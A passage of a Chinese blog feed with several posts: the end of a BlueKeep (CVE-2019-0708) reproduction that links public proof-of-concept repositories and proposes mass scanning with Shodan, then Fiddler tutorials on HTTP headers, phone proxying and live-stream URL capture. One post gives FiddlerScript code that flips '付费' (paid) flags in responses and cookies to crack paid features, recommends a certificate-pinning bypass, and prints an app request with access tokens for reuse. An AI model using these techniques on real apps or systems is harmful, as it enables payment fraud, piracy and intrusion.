rel="noopener">https://github.com/1amfine2333/CVE-2019-0708</a></td></tr><tr><td>Poc（未验证）</td><td><a href="https://github.com/Ekultek/BlueKeep" target="_blank" rel="noopener">https://github.com/Ekultek/BlueKeep</a></td></tr><tr><td>Poc（基于poc正在开发exp的项目）</td><td><a href="https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit" target="_blank" rel="noopener">https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit</a></td></tr></tbody></table><h5 id="5-1-已经开启远程连接，且网络设置正确："><a href="#5-1-已经开启远程连接，且网络设置正确：" class="headerlink" title="5.1 已经开启远程连接，且网络设置正确："></a>5.1 已经开启远程连接，且网络设置正确：</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/2dce944df2bf5494.png" alt></p><h5 id="5-2-验证机中克隆POC-开始验证："><a href="#5-2-验证机中克隆POC-开始验证：" class="headerlink" title="5.2 验证机中克隆POC,开始验证："></a>5.2 验证机中克隆POC,开始验证：</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/b1374b7e4c2e013d.png" alt></p><h5 id="5-3-靶机windows7-蓝屏重启："><a href="#5-3-靶机windows7-蓝屏重启：" class="headerlink" title="5.3 靶机windows7 蓝屏重启："></a>5.3 靶机windows7 蓝屏重启：</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/53a110f293d74507.png" alt></p><h4 id="6-总结与延伸："><a href="#6-总结与延伸：" class="headerlink" title="6.总结与延伸："></a>6.总结与延伸：</h4><p>可供验证的POC有很多，仅仅作为漏洞复现，采用了最直观的一种，整理的比较简略，后续可结合shodan，zoomeye等api，编程对具有潜在漏洞特征的目标，实现自动化信息采集和检测。</p>]]></content>
      
      
      
    </entry>
    
    
    
    <entry>
      <title>【Fiddler为所欲为第四篇】直播源抓取与接口分析</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-four/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-four/</url>
      
        <content type="html"><![CDATA[<ul><li><p>今天的教程，主要是教大家如何进行“封包逆向”，关键词跳转，接口分析。（怎么样，是不是感觉和OD很像~~~）<br>今天的教程我们以【麻花影视】为例，当然，其他APP的逻辑也是一样，通用的哦~<br>首先需要做好准备工作：（所有APP的抓包都会用到以下工具，就不要再说抓不到证书的包啦。）<br>1、安卓模拟器，并进行root。（推荐使用MUMU模拟器），当然，安卓手机肯定没有问题。<br>2、安装XP框架（用模拟器可以自适应），链接：<a href="https://pan.baidu.com/s/1YfLpVQb1QophNO38alNdug" target="_blank" rel="noopener">https://pan.baidu.com/s/1YfLpVQb1QophNO38alNdug</a> 提取码：5m98<br>3、安装https HOST（基于XP框架），链接：<a href="https://pan.baidu.com/s/1PFidSyoAtHynxNPF4t-voA" target="_blank" rel="noopener">https://pan.baidu.com/s/1PFidSyoAtHynxNPF4t-voA</a> 提取码：0f2d<br>以上的准备工作必须要做，不然很多包是抓不到的！！！<br>FD的wifi代{过}{滤}理教程就不说啦，网上很多，我这里直接开始演示哦~<br>第一步：<br>首先，我们打开咪咕视频，找到想要抓的节目，并观察FD里面是否有数据。【我这里就以【CCTV1】为例】。<br><img src="https://attach.52pojie.cn/forum/201902/12/111630rlmlqowxl2luxzqw.png" alt="img"></p><p><img src="https://attach.52pojie.cn/forum/201902/12/111710y5nasnq48y8xkwwq.png" alt="img"><br>若发现FD有数据，既表示正确，既可开始下一步。<br>第二步：<br>正常打开CCTV1，然后看FD里面的数据。<br><img src="https://attach.52pojie.cn/forum/201902/12/111905raeqtq7e6f4co4qe.png" alt="img"></p><p><img src="https://attach.52pojie.cn/forum/201902/12/111906lvckovfec0e2dl2f.png" alt="img"><br>第三步：<br>过滤封包，将所有封包进行数据化。<br><img src="https://attach.52pojie.cn/forum/201902/12/112204dpmrlssbhpbhqq4x.png" alt="img"><br>第四步：<br>进行关键字查询，和OD的PUSH大法差不多，直播源的关键词是【m3u8】。首先我们需要查询咪咕视频的节目源是否是m3u8格式，因此搜索：m3u8，若出现黄色表示该请求含有m3u8.因此，我们需要看看这个封包。<br><img src="https://attach.52pojie.cn/forum/201902/12/112524yiqqjcjt0qjqggmp.png" alt="img"><br>第五步：<br>封包分析，通常非常多数据的则是ison，所以我们点击json。<br><img src="https://attach.52pojie.cn/forum/201902/12/112937n16cetee36ewngwg.png" alt="img"><br>通过Json，很明显，可以看得出来，这个play.miguvideo.com这个域名，返回了一个m3u8的地址。<br>url=<a href="http://gslbmgsplive.miguvideo.com/wd_r2/cctv/cctv1/600/index.m3u8?msisdn=10b1efdfd58919f4ccf07b3987d39131&amp;mdspid=&amp;spid=699004&amp;netType=4&amp;sid=2200291011&amp;pid=2028597139×tamp=20190212113218&amp;Channel_ID=25000502-99000-200300080100005&amp;ParentNodeID=-99&amp;assertID=2200291011&amp;client_ip=125.123.158.154&amp;SecurityKey=20190212113218&amp;imei=008796753773920&amp;promotionId=&amp;mvid=&amp;mcid=&amp;mpid=&amp;encrypt=4b4a040bf73d40d80a8974fdc095d593" target="_blank" rel="noopener">http://gslbmgsplive.miguvideo.com/wd_r2/cctv/cctv1/600/index.m3u8?msisdn=10b1efdfd58919f4ccf07b3987d39131&amp;mdspid=&amp;spid=699004&amp;netType=4&amp;sid=2200291011&amp;pid=2028597139×tamp=20190212113218&amp;Channel_ID=25000502-99000-200300080100005&amp;ParentNodeID=-99&amp;assertID=2200291011&amp;client_ip=125.123.158.154&amp;SecurityKey=20190212113218&amp;imei=008796753773920&amp;promotionId=&amp;mvid=&amp;mcid=&amp;mpid=&amp;encrypt=4b4a040bf73d40d80a8974fdc095d593</a><br>可以看出，这个m3u8，包含了很多参数，比如我们的IP信息。<br><img src="https://attach.52pojie.cn/forum/201902/12/113051dogmflkvvqqbxafv.png" alt="img"><br>第六部：<br>用VCL等播放工具，试试看能不能播放。若可以播放，则证明我们的播放地址是对的。因此，play.miguvideo.com则是播放地址的接口。<br><img src="https://attach.52pojie.cn/forum/201902/12/113430z21rrhr7x4418r4h.png" alt="img"><br>第七部：抓任意频道的接口。<br>我们用在FD命令下输入：bpater play.miguvideo.com<br><img src="https://attach.52pojie.cn/forum/201902/12/114232x1vvgb1adll92znl.png" alt="img"><br>然后回车。<br><img src="https://attach.52pojie.cn/forum/201902/12/114232su6uooiiz2o5mjo6.png" alt="img"><br>第八部：<br>点击任意频道，就可以自动下断点得到播放地址了。而且非常明显！<br><img src="https://attach.52pojie.cn/forum/201902/12/114406wag1ewrxgxrzmq9g.png" alt="img"></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>【Fiddler为所欲为第三篇】封包逆向必备知识</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-three/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-three/</url>
      
        <content type="html"><![CDATA[<ul><li><blockquote><blockquote><blockquote><p>小A同学：会抓包有什么好学习的，不就用一个工具设置个wifi代{过}{滤}理就OK了嘛，还不是很多做不了。不如学习安卓逆向。<br> didi科学家：不好意思，抓包可以为所欲为。</p></blockquote><p>其实学习抓包，完完全全和OD是一模一样的逻辑，尤其是封包逆向。使用OD需要知道jmp等指令是什么意思，而抓包也是一样的逻辑！</p></blockquote><p>一、封包字段的含义</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135039covgodhuu3o88boo.png" alt="img">     </p><p>如图所示，Fiddler的整个界面就是这样，那么这些字段究竟是什么意思呢？这里给大家说一下：</p><p>Result：HTTP状态码　　　　　　</p><p>Protocol：请求使用的协议，如HTTP/HTTPS/FTP等</p><p>HOST：请求地址的主机名或域名</p><p>URL：请求资源的位置</p><p>Body：请求大小</p><p>Caching：请求的缓存过期时间或者缓存控制值</p><p>Content-Type：请求响应的类型</p><p>Process：发送此请求的进程ID</p><p>Comments：备注 </p><p>Custom：自定义值</p><p>二、Request区域</p><p>Request区域如图所示：</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135450gqpqw51wm2rarnaw.png" alt="img">     </p><p>那么每一个数据都是什么意思呢？</p><p>请求方式：GET/POST等 </p><p>协议： HTTP/1.1（通常都是这个）</p><p>\1. Cache 头域</p><p>　　if-Modified-since：缓存</p><p>　　if-None-Match：可提高性能（在Response中添加ETag信息，客户端再次请求资源，Request中加入if-None-Match（ETag的值），服务器验证ETag，若没改变返回状态码304，有改变，返回状态码200）</p><p>　　Pragma：防止页面被缓存</p><p>　　Cache-Control：Response—Request遵循的缓存机制</p><p>　　public：可以被任何缓存所缓存</p><p>　　private:内容只缓存在私有缓存中</p><p>　　no-cache：所有内容都不会被缓存</p><p>\2. Client 头域</p><p>　　User-Agent: 告知服务器客户端使用的操作系统与浏览器的名称和版本</p><p>　　Accept: 浏览器端可以接受的媒体、文件类型</p><p>　　Accept-Encoding: 指定压缩方法，是否支持压缩，支持什么压缩方法（gzip、deflate）</p><p>　　Accept-Language: 浏览器申明自己的接收语言</p><p>　　Accept-chareset：浏览器申明自己接收的字符集。如gb2312，UTF_8</p><p>\3. Cookies 头域</p><p>　　有的请求不发送Cookies,有的请求有Cookies。</p><p>　　目的：将cookie值发送给服务器</p><p> \4. Entity头域</p><p>　　Content-Length：发送给HTTP服务器的数据长度</p><p>　　Content-Type：决定文件接收方将以什么形式、什么编码读取此文件</p><p>\5. Security 头域：</p><p>　　Upgrade-Insecure-Requests: 1（默认，这个是自己协商的）</p><p>\6. Transport 头域：</p><p>　　Host: 发送请求时，该报头域是必需的。主要用于指定被请求资源的Internet主机和端口号，通常从HTTP URL 中提取出来</p><p>　　Proxy-Connection:  当网页打开完成后，客户端和服务器之间用于传输HTTP数据的TCP连接是否关闭。keep-alive表示不会关闭，客户端再次访问这个服务器上的网页，会继续使用这一条已经建立的连接；close表示关闭，客户端再次访问这个服务器上的网页，需要重新建立连接。</p><p>　　connection：Keep—alive            TCP连接不会关闭</p><p>　　connection：close                     一个Request完成后，TCP连接关闭</p><p>\7. Miscellaneous头域</p><p>　　Referer：提供了Request的上下文信息，告诉服务器我是从哪个链接过来的</p><p>　　A——&gt;B（B的服务器从Referer中统计有多少用户是从A过来的）</p><p>三、Response</p><p>Response如图所示：</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135912nv971av7gz7zhz87.png" alt="img">     </p><p>\1. Cache头域</p><p>　　Date：生成消息的具体时间和日期</p><p>　　Expires：浏览器在指定过期时间内使用本地缓存</p><p>\2. Cookie/Login头域</p><p>　　P3P：用户跨域设置cookie，可以解决iframe跨域访问cookie的问题</p><p>　　Set-Cookie：重要的header，用于把cookie发送到客户端浏览器，每一个写入cookie都会生成一个set-cookie</p><p>\3. Entity头域</p><p>　　ETag：与if-None-Match配合使用</p><p>　　Last-Modified：用于指示资源的最后修改日期和时间</p><p>　　Content-Type：Web服务器告知浏览器自己响应对象的类型和字符集</p><p>　　Content-Length：指明实体正文长度，以字节方式存储的十进制数字表示。在数据下行中，要预先在服务器中缓存所有数据，然后所有数据一并发给客户端</p><p>　　Content-Encoding：Web服务器表明自己用了什么压缩方式（gzip、deflate）压缩响应中的对象</p><p>　　Content-Language：服务器告知浏览器自己响应的对象语言</p><p>\4. Miscellaneous头域</p><p>　　Server：指明HTTP服务器的软件信息</p><p>　　X-Powered-By：表明网站是用什么技术开发的</p><p>　　X-AspNet-Version：如果网站是用Asp/Net开发的，这个header用来表明Asp/Net的版本</p><p>\5. Transport头域</p><p>　　connection：Keep—alive            TCP连接不会关闭</p><p>　　connection：close                     一个Request完成后，TCP连接关闭</p><p>\6. Location头域</p><p>　　Location：用于重定向一个新的位置，包括新的URL地址</p><p>四、HTTP认证过程</p><p>　　1. 客户端发送HTTP Request给服务器；</p><p>　　2. Request中未包含Authorization header，服务器会返回一个401错误给客户端，且在Response中的header“www-Authenticate”中添加信息；</p><p>　　3. 客户端将用户名和密码以base64加密后，放在Authorization中发送给服务器，认证成功；</p><p>　　4. 服务器将Authorization header中的用户名和密码去除，进行验证。如果验证通过，将根据请求发送资源给客户端；</p><p>　　HTTP OAuth认证：OAuth对于http来说，就是放在Authorization header中的不是用户名密码，而是一个token（令牌）。</p><p>　　客户端的使用：客户端若要跟“使用基本认证的网站”进行交互，将用户名密码加载Authorization header中即可。</p><p>五、Fiddler常见图标的含义</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/140158gnv8bl6hlo7uul3v.png" alt="img">     </p></blockquote></li></ul>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>使用fiddler对手机上的程序进行抓包</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler/</url>
      
        <content type="html"><![CDATA[<ul><li><h3 id="用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。"><a href="#用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。" class="headerlink" title="用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。"></a>用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。</h3></li></ul><h4 id="前提："><a href="#前提：" class="headerlink" title="前提："></a><strong>前提：</strong></h4><p>  1.必须确保安装fiddler的电脑和手机在同一个wifi环境下</p><p>  备注：如果电脑用的是台式机，可以安装一个随身wifi，来确保台式机和手机在同一wifi环境下</p><p>  2.可以使用电脑安卓模拟器</p><h4 id="安装配置步骤："><a href="#安装配置步骤：" class="headerlink" title="安装配置步骤："></a><strong>安装配置步骤：</strong></h4><h5 id="1-下载一个fiddler，网上随便下一个就可以了"><a href="#1-下载一个fiddler，网上随便下一个就可以了" class="headerlink" title="1.下载一个fiddler，网上随便下一个就可以了"></a>1.下载一个fiddler，网上随便下一个就可以了</h5><h5 id="2-配置fiddler"><a href="#2-配置fiddler" class="headerlink" title="2.配置fiddler"></a>2.配置fiddler</h5><p>  <strong>Tools-&gt;Fiddler Options-&gt;Connections</strong></p><p>  <strong><img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120716187-103213269.png" alt="img"></strong></p><p>  说明：1.Fiddler listens on port是手机连接fiddler时的代理端口号，默认8888即可</p><p>  ​          2.Allow remote computers to connect是允许远程发送请求，需要勾上</p><p>  <strong>Tools-&gt;Fiddler Options-&gt;HTTPS</strong></p><p>  <strong><img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120733937-1858884840.png" alt="img"></strong></p><p>  说明：勾上Decrypt HTTPS traffic，会抓到手机的https请求，如果想抓到https请求还需要在手机安装证书，下面会介绍</p><p>  【fiddler设置后一定要把fiddler重启一下才会生效】</p><h5 id="3-手机上的配置"><a href="#3-手机上的配置" class="headerlink" title="3.手机上的配置"></a>3.手机上的配置</h5><p>  3.1需要安装fiddler证书</p><p>  使用手机浏览器访问http://【电脑IP地址】:【fiddler设置的端口号】，既可以下载fiddler的证书并安装</p><p>  【查看电脑IP的方法，直接在cmd下ipconfig，或者鼠标滑过fiddler的online也可以看到IP地址】</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120802296-757506898.png" alt="img"></p><p>  以上面看到的我的IP地址为例，手机只要访问<a href="http://10.252.167.91:8888即可下载安装fiddler证书" target="_blank" rel="noopener">http://10.252.167.91:8888即可下载安装fiddler证书</a></p><p>  3.2手机设置wifi的代理</p><p>  连接与电脑相同的wifi，修改wifi的网络，手动设置代理，代理服务器主机名为电脑的IP地址，代理端口为在fiddler里设置的端口号，保存后，fiddler将能够收到手机上的请求信息</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120829921-223800751.png" alt="img"></p><p>  以上就是配置方法，其他的就可以直接用了，比如在fiddler里进行一下请求的过滤，只看某个服务器下的请求，配置后要点一下Actions来保存过滤</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120845093-525900958.png" alt="img"></p><p>  在测试中可能会有测试环境，测试环境有的公司时域名相同，但是hosts不同，通过不同的服务器IP地址指向来确定是什么环境。在PC测试上可以非常方便的更改本机hosts指向来切换测试环境和线上环境，在手机上更改hosts比较麻烦。这时候就可以利用fiddler来连接手机，更改电脑的hosts，来实现手机连接测试环境的操作。</p><p>  注意：</p><p>  1.手机配置了代理，fiddler必须启动，手机才可以上网，如果fiddler关闭后手机是不可以联网了，需要将代理去掉才可以进行联网。</p><p>  2.fiddler启东时，会默认将Internet的代理更改为127.0.0.1，在正常退出fiddler时代理会恢复为原来的代理。但是如果遇到fiddler不正常退出（比如进程直接杀掉），会导致代理没有恢复的情况，这是需要手动修改Internet的代理（恢复为原来的代理或者取消代理）</p><p>  设置Internet代理的方法如下：</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120853421-360569062.png" alt="img"></p>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Fiddler大解析！抱歉，抓包抓得好真的可以为所欲为</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-one/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-one/</url>
      
        <content type="html"><![CDATA[<p>说起抓包，很多人以为就是用个工具，简简单单地抓一下就可以了。</p><p>在这里，我必须发一个教程，解析一下抓包神器——Fiddler。</p><p>Fiddler仅仅是一个抓包工具？不好意思，Fiddler用得好，真的可以为所欲为。</p><p>Fiddler的作者</p><ul><li>Fiddler 的作者是 Eric Lawrence 是个大师级的人物， 目前在微软总部西雅图工作。 他的博客是: <a href="http://www.ericlawrence.com/Eric/" target="_blank" rel="noopener">http://www.ericlawrence.com/Eric/</a></li><li>博客中能看到他的简历，以及一些生活照.</li></ul><p>Fiddler的介绍</p><ul><li>Fiddler是强大的抓包工具，它的原理是以web代{过}{滤}理服务器的形式进行工作的，使用的代{过}{滤}理地址是：127.0.0.1，端口默认为8888，我们也可以通过设置进行修改。</li><li>代{过}{滤}理就是在客户端和服务器之间设置一道关卡，客户端先将请求数据发送出去后，代{过}{滤}理服务器会将数据包进行拦截，代{过}{滤}理服务器再冒充客户端发送数据到服务器；同理，服务器将响应数据返回，代{过}{滤}理服务器也会将数据拦截，再返回给客户端。</li><li>Fiddler可以抓取支持http代{过}{滤}理的任意程序的数据包，如果要抓取https会话，要先安装证书。</li></ul><p>这两点，希望大家牢记。接下来，给大家介绍Fiddler超级强大的地方之一——Fiddler Script.</p><p> 论坛有很多Fiddler的使用教程，这里就不多说了。但是，却没有一个人说到最强大的脚本功能！</p><blockquote><p>Fiddler 包含了一个脚本文件可以自动修改Http Request 和Response.这样我们就不需要手动地下”断点”去修改了，实际上它是一个脚本文件CustomRules.js<br> 位于: C:\Documents and Settings[your user]\My  Documents\Fiddler2\Scripts\CustomRules.js 下，你也可以在Fiddler  中打开CustomRules.js 文件，  启动Fiddler, 点击菜单Rules-&gt;Customize Rules…<br> Fiddler Script 的官方帮助文档必须认真阅读， 地址是：<a href="http://www.fiddler2.com/Fiddler/dev/ScriptSamples.asp" target="_blank" rel="noopener">http://www.fiddler2.com/Fiddler/dev/ScriptSamples.asp</a></p></blockquote><p>小常识：Fiddler Script 是用JScript.NET语言写的</p><p>那么Fiddler Script到底有什么用？我这里来列举一些大家肯定遇到过的问题：</p><p>场景1：一个付费验证，是否付费会返回一个json。里面有一个时间戳和一个false。如果时间戳和客户端不一致，则为<a href="https://www.52pojie.cn" target="_blank" rel="noopener">破解</a>失败。</p><p>那么你一定会这么想，有没有一个功能，可以只替换json里面部分参数，然后返回给客户端，而不是全部写死呢？于是，我们需要使用到script了！代码如下：如一个json是这个内容，baidu.com，返回了一个【name:吾爱破解，付费:false】</p><blockquote><p> if (oSession.fullUrl.Contains(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">http://www.baidu.com&quot;)</a>)<br>          {</p><pre><code>          // 获取Response Body、Request Body中JSON字符串，转换为可编辑的JSONObject变量          var responseStringOriginal =  oSession.GetResponseBodyAsString();          var responseJSON = Fiddler.WebFormats.JSON.JsonDecode(responseStringOriginal);          var requestStringOriginal=oSession.GetRequestBodyAsString();          var requestJSON = Fiddler.WebFormats.JSON.JsonDecode(requestStringOriginal);          ){ //请求参数中，若type为1，对返回值做如下修改              responseJSON.JSONObject[&#39;付费&#39;] = &quot;true&quot;;              // 重新设置Response Body              var responseStringDestinal = Fiddler.WebFormats.JSON.JsonEncode(responseJSON.JSONObject);              oSession.utilSetResponseBody(responseStringDestinal);          }      }</code></pre><p>  }</p></blockquote><p> 通过以上代码，即可每次在baidu返回数据时，自动将付费改为true，从而达到了破解的效果。</p><p>场景2：我想要修改request的Body里面的部分参数，每次下完断点，修改完再提交，总会网络超时或者APP超时。这该怎么办？难道只能靠手速？</p><blockquote><p>​    if(oSession.uriContains(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">http://www.baidu.com&quot;)</a>)<br>​     {<br>​         var strBody=oSession.GetRequestBodyAsString();// 获取Request 中的body字符串<br>​         strBody=strBody.replace(“false”,”true”);// 用正则表达式或者replace方法去修改string，将false改为true<br>​         FiddlerObject.alert(strBody);// 弹个对话框检查下修改后的body<br>​         oSession.utilSetRequestBody(strBody);// 将修改后的body，重新写回Request中<br>​     }</p></blockquote><p>场景3：我想要修改cookie，改成一个付费过的cookie，但是需要实时生成，不能靠手速。这该怎么办？</p><blockquote><p>  if  (oSession.HostnameIs(‘<a href="http://www.baidu.com&#39;" target="_blank" rel="noopener">www.baidu.com&#39;</a>) &amp;&amp;  oSession.uriContains(‘pagewithCookie’) &amp;&amp;  oSession.oRequest.headers.Contains(“Cookie”))<br>      {<br> var sCookie = oSession.oRequest[“Cookie”];<br>      //  用replace方法或者正则表达式的方法去操作cookie的string<br>      sCookie = sCookie.Replace(“付费=false”, “付费=true”);<br>      oSession.oRequest[“Cookie”] = sCookie; </p></blockquote><p>场景4：我想要知道他到底有没有请求具体哪个网址，用查找速度太慢了。过滤也很慢。</p><blockquote><p> if (oSession.HostnameIs(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">www.baidu.com&quot;)</a>) {<br>             oSession[“ui-color”] = “red”;<br>         }</p></blockquote><p>场景5：我想要自动保存某个接口的数据到本地，怎么才能实现？</p><blockquote><p> if (oSession.fullUrl.Contains(“<a href="http://www.baidu.com/playurl/v1/&quot;" target="_blank" rel="noopener">www.baidu.com/playurl/v1/&quot;</a>) ){<br>                         oSession.utilDecodeResponse();//消除保存的请求可能存在乱码的情况<br>                         var fso;<br>                         var file;<br>                         fso = new ActiveXObject(“Scripting.FileSystemObject”);<br>                         //文件保存路径，可自定义<br>                         file = fso.OpenTextFile(“D:\Sessions.txt”,8 ,true, true);<br>                         //file.writeLine(“Response code: “ + oSession.responseCode);<br>                         file.writeLine(“Response body: “ + oSession.GetResponseBodyAsString());<br>                         file.writeLine(“\n”);<br>                         file.close();<br>                 } </p></blockquote><p> ——————————————————————————————————————————————————————————————————————</p><p> 以上就是Fiddler script经常使用到的功能，免费奉献给大家。直接复制即可使用。</p><p> Fiddler的脚本介绍到这里，那么，说到底Fiddler还是只能抓包啊，即使基于xpoesd能抓到https的包，还是发现有很多包抓不到啊！！！等等，本文还没完呢！</p><p> （</p><p><strong>接下来的内容，公布过后，会涉及到技术滥用，因此，仅公布原理。</strong></p><p>）</p><p> 首先来讲https，也就是安卓APP证书这一款，目前论坛上已经有不少的朋友发了相关的一些程序，大家可以去下载。</p><p> 如：</p><p><a href="https://www.52pojie.cn/thread-854170-1-1.html" target="_blank" rel="noopener">https://www.52pojie.cn/thread-854170-1-1.html</a></p><p> 但是，我个人比较倾向于just trust me这个插件，这是最全能的。just trust me是hook了安卓框架验证机制，更加棒~</p><p> ————————————————————————————————————————————————————————</p><p> 首先，大家抓包会遇到一个问题，为什么即使绕过了APP证书验证，为什么还是抓不到包！难道不是http协议？</p><p> 其实并不是，APP大多数还是走的http协议，那为什么抓不到优酷的视频？抓不到关键的访问——原因在于此，代{过}{滤}理！</p><blockquote><p>目前有非常多的APP，都为了防止被抓包，不仅仅是只用了https这么简单。而使用fiddler抓不到包，本质原因在于wifi代{过}{滤}理！很多APP会检测你是否用了wifi代{过}{滤}理，如果设置了，则APP无法正常使用。这样就会从根本上杜绝被抓包</p></blockquote><p> 那么，我们要怎么做才能防止这种情况的发生呢？</p><p> 比较笨的一种办法依旧是使用xposed上的just trust me，依旧hook相关函数，即可破解该策略。</p><p> —————————————————————————————————————————————————————————</p><p> 等等，我发现用了trust me过后，还是抓不到包，这到底是怎么回事！！！</p><p> 非常简单，他们就是利用了本地服务器中转，这样的话Fiddler是抓不了包的。比如著名APP：麻花影视、电视家</p><p> 那么，有没有办法能抓到这种操作的包呢？当然是有的。</p><p> 这边只能透露几点，不能正大光明地公布，否则大量非法分子就可以破解非常多的APP了。</p><blockquote><p>提示：Fiddler的本质其实就是代{过}{滤}理服务器，那么，如果是代{过}{滤}理服务器，所有的请求是不是都会走这台服务器呢？那是肯定的。</p></blockquote><p> ——————————————————————————————————————————————————————————</p><p> 最后，抓包除了破解APP以外，还有什么用？</p><p> 第一：抓接口，可以将所有的视频点播类APP都抓下来！</p><p> 如麻花视频：</p><p> ————————</p><blockquote><p>GET <a href="http://api.acgplusplus.com/api/app/video/ver2/user/clickPlayVideo_tv/7/1450?videoId=53913&amp;time=1547183436020" target="_blank" rel="noopener">http://api.acgplusplus.com/api/a … &amp;time=1547183436020</a> HTTP/1.1</p></blockquote><blockquote><p>Content-Type: application/json</p></blockquote><blockquote><p>Accept: application/json</p></blockquote><blockquote><p>accessToken: 936b8872c4f81b6537eaa80f4e2e78c7807cebbcb02548d8d4da1e55c61c6509</p></blockquote><blockquote><p>X-Client-NonceStr: FbWu9jFnpG</p></blockquote><blockquote><p>X-Client-IP: 127.0.0.1</p></blockquote><blockquote><p>X-Client-TimeStamp: 1543592259810</p></blockquote><blockquote><p>X-Client-Version: 1.1.1</p></blockquote><blockquote><p>X-Client-Sign: 61274de99728b3981041d657bec4528b416658cd651110f9cf950dd3fbc0b15f</p></blockquote><blockquote><p>X-Auth-Token: mb_token:25361603:1211f5511483be1def9af655c10ede12</p></blockquote><blockquote><p>X-Client-Token:</p></blockquote><blockquote><p>Host: api.acgplusplus.com</p></blockquote><blockquote><p>Connection: Keep-Alive</p></blockquote><blockquote><p>User-Agent: okhttp/3.10.0</p></blockquote><blockquote><p>Accept-Encoding: identity</p></blockquote><p> ——————————————————————————————————</p><p> 这个接口大家可以用用，永不失效的接口！返回出来的地址就是这样。（大家可以直接用，哈哈，本来麻花视频也是盗版的）</p><p> 再比如优酷的播放接口：</p><blockquote><p>GET <a href="https://ups.youku.com/ups/get.json?ckey=" target="_blank" rel="noopener">https://ups.youku.com/ups/get.json?ckey=</a>不公布，免得被盗用<br> User-Agent: Youku;7.5.0;Android;6.0.1;MuMu<br> Host: ups.youku.com<br> Connection: Keep-Alive<br> Accept-Encoding: gzip, deflate</p></blockquote><p> 这些接口，全都是永久有效的！</p><p> 拥有抓包技术，你就可以自己制作任何的视频APP，调用第三方的接口即可！！！</p><p> 另外楼主尝试过支付宝等相关APP，依旧能抓到部分的包。</p><p>#### </p>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>【Fiddler为所欲为第二篇】像OD一样调试</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-two/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-two/</url>
      
        <content type="html"><![CDATA[<ul><li><blockquote><p>导语：<br> 其实Fiddler隐藏的功能太多太多，其调试功能也是异常强大，可以说是抓包界的“<a href="https://www.52pojie.cn/thread-350397-1-1.html" target="_blank" rel="noopener">OllyDbg</a>”并不为过。接下来，教大家如何使用Fiddler进行调试、解析，甚至封包“逆向”！</p></blockquote></li></ul><p><strong>一、像OD一样定制菜单</strong></p><pre><code>   1.1定制rule菜单的子菜单</code></pre><blockquote><blockquote><blockquote><p>​    // 定义名为52pj的子菜单<br>​     RulesString(“&amp;52pj”, true);<br>​     // 生成52pj子菜单的radio选项<br>​     RulesStringValue(0,”安卓8.0”, “52pj&amp;狂暴补师亚丝娜&amp;k=52pj”)<br>​     RulesStringValue(1,”安卓9.0”, “52pj&amp;610100&amp;k=52pj”)<br>​     RulesStringValue(2,”安卓10.0”, “52pj&amp;didi科学家&amp;k=52pj”)<br>​     RulesStringValue(3,”安卓11.0”, “52pj&amp;CrazyNut&amp;k=52pj”)<br>​     RulesStringValue(4,”&amp;Custom…”, “%CUSTOM%”)<br>​     public static var s52pj: String = null;</p></blockquote><blockquote><p>}</p></blockquote></blockquote><p>还需要在OnBeforeRequest函数中加入：</p></blockquote><blockquote><p>   if (null != s52pj) {<br>      oSession.oRequest[“52pj”] = s52pj; </p></blockquote><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/122553e3cqsscluu81cd8q.png)     </code></pre><p>   效果图：<br>      <img src="https://attach.52pojie.cn/forum/201901/25/122449x5588avmamylllcv.png" alt="img">     </p><p>   1.2定制tool菜单的子菜单</p><blockquote><blockquote><blockquote><p>public static ToolsAction(“我是子菜单”)<br> function DoManualYules(){</p></blockquote><p>//子菜单的功能<br>      FiddlerObject.alert(“我是子菜单”); // 根据需要定制<br> }</p></blockquote></blockquote><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/122803pn9gan9rnfvgcf1n.png)     </code></pre><p>   1.3定制右键菜单</p><blockquote><p> public static ContextAction(“我是右键菜单”)<br>  function DoOpenInIE(oSessions: Fiddler.Session[]){<br>      